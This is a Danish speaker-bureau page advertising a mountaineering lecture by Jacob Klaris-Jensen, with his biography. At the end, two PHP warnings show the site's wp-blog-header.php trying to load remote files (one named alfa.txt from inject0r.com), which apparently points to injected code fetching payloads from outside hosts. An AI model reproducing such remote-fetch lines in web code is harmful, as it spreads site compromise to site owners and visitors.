img-us
  • asc

    Foredragsholder Jacob Klaris-Jensen

  • asc

    Emne No shortcuts to the summit

  • asc

    pris 6000.-

Beskrivelse af foredraget
Jacob beretter levende og personligt om kampen for at nå sine mål. For Jacob er det i naturen, og særligt i bjergene. Ofte i et miljø som presser både kroppen og ikke mindst sindet maksimalt. Jacob vil fortælle om den virkelighed, man som bjergbestiger står ansigt til ansigt med, når situationen spidser til og kræver ens fulde fokus. Samt om hvilke tanker man gør sig, når det, man er i gang med, ikke bare er åndeløst spændende, men også så farligt, at der er en reel risiko for, at man ikke kommer tilbage.

Jacob vil ligeledes berette om det eventyr og de kulturer, som venter én derude, hvor den sidste turistbus for længst er vendt om. Men også om de afsavn og konsekvenser, som findes ved at være totalt isoleret i månedsvis langt fra vores moderne liv med wifi, venner og familie.

Jacob vil tage udgangspunkt i nogle episke udvalgte, og meget forskellige historier fra sine eventyr, som alle er krydret med fantastiske billeder og små anekdoter. Som altid vil Jacobs foredrag være kendetegnende ved humor og masser af energi.

Beskrivelse af Jacob Klaris-Jensen
Jacob Klaris-Jensen er bjergbestiger, eventyrer, iværksætter samt en meget levende og rutineret oplægs- og foredragsholder. Jacob er uddannet lærer, og aktiv med eget firma, som arbejder med kurser, events og teamudvikling indenfor områderne friluftsliv, udvikling og læring.

Jacobs store hang til ekspeditionsliv og eventyr har ført ham på utallige rejser og ekspeditioner rundt omkring på fjerntliggende kontinenter. Heraf kan bl.a nævnes første krydsning til fods fra syd-nord i Abadares (Kenya), 4x4 kørsel i Tibets højland, og trekking og bjergbestigning i Cordillera Blanca (Peru). Jacob har besteget mere end 90 bjerge, heraf bestigninger som guide på Elbrus, Kilimanjaro og Aconcagua m.fl. Hertil kommer Jacobs egne ekspeditioner og bestigninger af Gasherbrum II (8035m), Pakistan, samt Peak 6541m (førstebestigning), Kina.
SHARE THIS:

Share: 0

Send en forespørgsel på et
foredrag

Andre foredragsholdere

Sabrina Vitting-Seerup

Patrick Iversen Larsen

John Mejlgren

Andreas Øster (Mr. Chairman)


Warning: file_get_contents(https://inject0r.com/wp-content/uploads/2020/10/alfa.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 410 Gone in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22

Warning: file_get_contents(https://ziarroman.ro/wp-content/uploads/2021/04/ads.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22